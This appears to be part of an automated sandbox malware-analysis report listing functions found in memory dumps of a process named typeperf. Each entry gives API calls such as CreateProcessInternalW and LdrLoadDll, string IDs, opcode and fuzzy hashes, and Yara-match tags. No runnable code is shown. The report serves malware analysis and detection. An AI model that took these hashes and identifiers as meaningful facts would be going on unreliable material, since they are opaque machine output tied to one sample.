                                                                                                                        • Instruction Fuzzy Hash: 33319CB5A00704ABD314DFA4DC80FA7B7BDFB88704F10852EEA5D9B285D770A954CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02938901 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 214COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 02938A06
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 3188754299-2766056989
                                                                                                                        • Opcode ID: a8ef0e7072dde3be16568fbafaa9278c0397958131a85aa89ada05463a995ce9
                                                                                                                        • Instruction ID: fd0b9c884bf735da9c7045a6e4e48db674deb32dd63f9d9b5b4e8211d0ae75d7
                                                                                                                        • Opcode Fuzzy Hash: a8ef0e7072dde3be16568fbafaa9278c0397958131a85aa89ada05463a995ce9
                                                                                                                        • Instruction Fuzzy Hash: 6D7153B29102186ADB25DBA4CCC5FFBB3BDBF94304F04499DB51997140EB70AB858F60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0293E290 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0293E2A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                        • Opcode ID: d2ad74de19692b63ac0a36c10c72401cbc70f1131e5eb859e7051404c2950e98
                                                                                                                        • Instruction ID: 0131fc85be4f4b74cc808a680eac063b85bafabfd106bd32f0238aea0231ff2c
                                                                                                                        • Opcode Fuzzy Hash: d2ad74de19692b63ac0a36c10c72401cbc70f1131e5eb859e7051404c2950e98
                                                                                                                        • Instruction Fuzzy Hash: C7313EB6A0060AAFDB00DFD8C880DEFB7B9FF88304B108559E555EB214D775EE058BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0293E28B Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0293E2A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Initialize
                                                                                                                        • String ID: @J7<
                                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                                        • Opcode ID: f3887c4531889087e89bf742d080641379a60d0c39df3a7be98db3b949d363f5
                                                                                                                        • Instruction ID: 4a54991497113b7e0c7c0b22075e334cf02fbf2c76268938e3607c3021affa3d
                                                                                                                        • Opcode Fuzzy Hash: f3887c4531889087e89bf742d080641379a60d0c39df3a7be98db3b949d363f5
                                                                                                                        • Instruction Fuzzy Hash: 05311CB6A0060A9FDB10DFD8D8809EFB7B9FF88304B108559E556EB214D775EE058BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0294529A Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02937343,00000010,?,?,?,00000044,?,00000010,02937343,?,?,?), ref: 02945303
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2186235152-0
                                                                                                                        • Opcode ID: 3cfa6bc68db8286e614621698ba3190c077ffbb7deee45df6bbe48e66e68cbff
                                                                                                                        • Instruction ID: ffe1f5e04f96f0e4a764bae25adb10a48e6c632592035f43bf8d756e7312234b
                                                                                                                        • Opcode Fuzzy Hash: 3cfa6bc68db8286e614621698ba3190c077ffbb7deee45df6bbe48e66e68cbff
                                                                                                                        • Instruction Fuzzy Hash: CC112AB2205545AFCB08DF98DC85EEB77A9EFCC714F414148F90AD7251DA30E811CB60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02933F00 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02933F72
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Load
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2234796835-0
                                                                                                                        • Opcode ID: d07f43acae5381c7935257da1f181071a1ba76ca27e944f1e8fe1308dfd9cdbf
                                                                                                                        • Instruction ID: fb7c737a205318955eb17ac4b7c030ed48a8bfde24bb984074e1c2dd8e2cba29
                                                                                                                        • Opcode Fuzzy Hash: d07f43acae5381c7935257da1f181071a1ba76ca27e944f1e8fe1308dfd9cdbf
                                                                                                                        • Instruction Fuzzy Hash: D1011EB5D4020DABDB10EBE5DC41FEEB3799B54308F0041E5E90897241FA31E7188B91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 029452A0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,02937343,00000010,?,?,?,00000044,?,00000010,02937343,?,?,?), ref: 02945303
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInternalProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2186235152-0
                                                                                                                        • Opcode ID: f12e911e26f4a6b4a849f1f4722be75341e2d5712503af54260f892dc2f018f3
                                                                                                                        • Instruction ID: cfda0257246dc3c988894e90a86f017a09d500b7faaa7371df8aec03ca9ac9a7
                                                                                                                        • Opcode Fuzzy Hash: f12e911e26f4a6b4a849f1f4722be75341e2d5712503af54260f892dc2f018f3
                                                                                                                        • Instruction Fuzzy Hash: B801C4B2210108BBCB44DE89DC80EEB77ADEFCC714F418209BA0DE3240DA30F8518BA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02929940 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02929985
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: 5063638a2c36aa17fdc4f42d11aef01adc69ceda02bd84804e6c7a4b00b0560a
                                                                                                                        • Instruction ID: 93a48f7b258871449b9fb42f666ca30fc67b3a5db07f3a32ec444a17342671ce
                                                                                                                        • Opcode Fuzzy Hash: 5063638a2c36aa17fdc4f42d11aef01adc69ceda02bd84804e6c7a4b00b0560a
                                                                                                                        • Instruction Fuzzy Hash: 7CF0653334061436E22062A99C02FD7774CDBC47A5F140415F71CEA1C0D991B4114AE4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02945205 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1BBCDC16,00000007,00000000,00000004,00000000,029336F4,000000F0,?,?,?,?,00000000), ref: 0294524C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: d8b306892d8606a62299baf7e2a6639e41849263605d610f6cfd06968e66af16
                                                                                                                        • Instruction ID: 81f35e10474543c11c9aee9ab3980546f39627f607b952d14cccfb9f821e12a3
                                                                                                                        • Opcode Fuzzy Hash: d8b306892d8606a62299baf7e2a6639e41849263605d610f6cfd06968e66af16
                                                                                                                        • Instruction Fuzzy Hash: DCF0A0B62006087BD620DE98DC40FEB33ACDFC9714F400405FD4CA7201CA21B9228AB5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0292993F Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02929985
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2422867632-0
                                                                                                                        • Opcode ID: 03457372c09b1ed5863a6cdbec27e54c16f22d8d3bf367779d6dfa49f3637d11
                                                                                                                        • Instruction ID: 31b613872ae61882730841b1c979aafafb81721538d4a08704cf62b54981b7ab
                                                                                                                        • Opcode Fuzzy Hash: 03457372c09b1ed5863a6cdbec27e54c16f22d8d3bf367779d6dfa49f3637d11
                                                                                                                        • Instruction Fuzzy Hash: A1F092326807143AE33062A99C02FEB779C9FD4795F240019FB1CEB2C1DAA178118AA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02945210 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,1BBCDC16,00000007,00000000,00000004,00000000,029336F4,000000F0,?,?,?,?,00000000), ref: 0294524C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: d6d421d3af4fb84aee112c9918af139c887d1746b00b50d2d461a945189bfadb
                                                                                                                        • Instruction ID: 05189c0b8c9d21ef664152dd82ca875394381c4a5a9c7454a93c3a46758a2af7
                                                                                                                        • Opcode Fuzzy Hash: d6d421d3af4fb84aee112c9918af139c887d1746b00b50d2d461a945189bfadb
                                                                                                                        • Instruction Fuzzy Hash: 5AE06D712002187BD610EE99DC40FEB33ADDFC9710F404418FD0CA7241DA70B9218AB5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 029451C0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlAllocateHeap.NTDLL(02931D56,?,0294399B,02931D56,029432B7,0294399B,?,02931D56,029432B7,00001000,?,?,02946A10), ref: 029451FF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279760036-0
                                                                                                                        • Opcode ID: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction ID: e1aa21e93884d7b8b6f0efe9f4f0e27f03af35c83b40b9686bcac5db826d1a0b
                                                                                                                        • Opcode Fuzzy Hash: 12b1db68d580400a64ae763202157b5fca0cc943ed3effe7dac2130023a2e661
                                                                                                                        • Instruction Fuzzy Hash: 5CE065726002187BD610EE99DC40FEB33ADEFC8710F404419F90CA7241DA30B9118EB4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02937380 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 029373AC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 2a7d669931d6e0cb145b725e85ac90b0e02642550949f89e31e455212460c42d
                                                                                                                        • Instruction ID: c7471c995affc574f2521e1f3f01e8fab12534a87fdfe90e3b8d2d0168ba2f76
                                                                                                                        • Opcode Fuzzy Hash: 2a7d669931d6e0cb145b725e85ac90b0e02642550949f89e31e455212460c42d
                                                                                                                        • Instruction Fuzzy Hash: 27E080B15C070427F72855FCEC45FA6339C4748768F144550BD2CDB2C1E675F5114560
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0293718D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,0293182A,02931F99,029432B7,00000000), ref: 029371C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: df449ebfa000ae5b237b49492d0fd22eda0280e8947658d3bff59b12cabe255f
                                                                                                                        • Instruction ID: f5e306ea87db6fb726e9492cc4f29908f4f697fcece17b4c7c6ce3c2d5cb504a
                                                                                                                        • Opcode Fuzzy Hash: df449ebfa000ae5b237b49492d0fd22eda0280e8947658d3bff59b12cabe255f
                                                                                                                        • Instruction Fuzzy Hash: A9E02BB56402053EF714E3F49C03FAA36490B84384F144064B90CE72C6E954E0024D11
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02937190 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,0293182A,02931F99,029432B7,00000000), ref: 029371C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: 780140fb360f83bb39098dc26f6a31938a35ff2fbc14cbd855bb62296a0f9501
                                                                                                                        • Instruction ID: 20b65c9f58d7cc1e26166f89af0bd3c5172e7cda72c52b330cc7c9b723981ca7
                                                                                                                        • Opcode Fuzzy Hash: 780140fb360f83bb39098dc26f6a31938a35ff2fbc14cbd855bb62296a0f9501
                                                                                                                        • Instruction Fuzzy Hash: 5ED05EB66407053BF614E6F5DC02F66328D4B88799F154064BA0CEB2C6E955F1114965
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: fe073fcc5e95f93d36a3daf1c3481f11e20ec77b28f66cd47a1cdf031fa85098
                                                                                                                        • Instruction ID: 05ed12aab290c1c2da72bc12328dcc7c436693860f8b74dbe52d67d8f37af099
                                                                                                                        • Opcode Fuzzy Hash: fe073fcc5e95f93d36a3daf1c3481f11e20ec77b28f66cd47a1cdf031fa85098
                                                                                                                        • Instruction Fuzzy Hash: F8B09B719015C5C5DA11E7644A48B17794467D0701F19C461F2034641E4779D5D1E575
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 0292E0C7 Relevance: .0, Instructions: 17COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1fd663ab2ce34104b3c3ce5b2833f4a00eee98f767d60d92a51b992d19381ce
                                                                                                                        • Instruction ID: f74229302ae57d0a695195075afe3f3cc7563fba292a3a0c6b2ebe86dee0d1e0
                                                                                                                        • Opcode Fuzzy Hash: f1fd663ab2ce34104b3c3ce5b2833f4a00eee98f767d60d92a51b992d19381ce
                                                                                                                        • Instruction Fuzzy Hash: 14C08C32E0A0041BD2100C0D78022B8F3A4E78B122F0421A7EC6CE3A00B10BD02E108D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 2146ea08b92bc136ffa848cadaae34d8c7adbdd6ebc4c3e28693ee02fbdc1133
                                                                                                                        • Instruction ID: d25cb0ecfaa1efa1b69c0e8faacb8d1e0921c3687e93ba43699af85a16b9bc5f
                                                                                                                        • Opcode Fuzzy Hash: 2146ea08b92bc136ffa848cadaae34d8c7adbdd6ebc4c3e28693ee02fbdc1133
                                                                                                                        • Instruction Fuzzy Hash: FF51A6B6A04116AFCB20DB98CCD097FFBFCBB082417148569F4A5E7641D374EE508BA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 033B2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: b789506f24ec36a1b0c58451a872a202ae88f1e0f42305b6b404ab0c1abb6ee8
                                                                                                                        • Instruction ID: c049a0df0cdcf906dedd82b7e38e10362640cdf62f2bf55c95b3f2c1ef0e4f52
                                                                                                                        • Opcode Fuzzy Hash: b789506f24ec36a1b0c58451a872a202ae88f1e0f42305b6b404ab0c1abb6ee8
                                                                                                                        • Instruction Fuzzy Hash: 9B51D5B5A00649AECB24DE5CCCD09BFF7FDAB44200B048E6AE6D6D7E41D774DA808760
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03337630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033746FC
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03374742
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03374725
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03374655
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 03374787
                                                                                                                        • ExecuteOptions, xrefs: 033746A0
                                                                                                                        • Execute=1, xrefs: 03374713
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: 1e6683f4ccb06601630dd8656bbaa4447c7f938455bb3d6e2b25dc30f0879aac
                                                                                                                        • Instruction ID: f9bb655e03dca9bd540350fc63057ccf50440d9fec25ea25f5a699f0a2cf6598
                                                                                                                        • Opcode Fuzzy Hash: 1e6683f4ccb06601630dd8656bbaa4447c7f938455bb3d6e2b25dc30f0879aac
                                                                                                                        • Instruction Fuzzy Hash: AE51F7B5A403197ADF20EBA5ECD6FBE77ACEF05300F4440A9E505AB191E770AA45CF50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0334B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: f41df212b2893604108365e031ab6dbe277ad22a0b6a55fc5a27c358a4b81253
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: E981AD74E052499ADF28CF68C9D17BEFBE6AF45360F1C4159E8E1A7391C634E8408B64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0332F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033702BD
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033702E7
                                                                                                                        • RTL: Re-Waiting, xrefs: 0337031E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
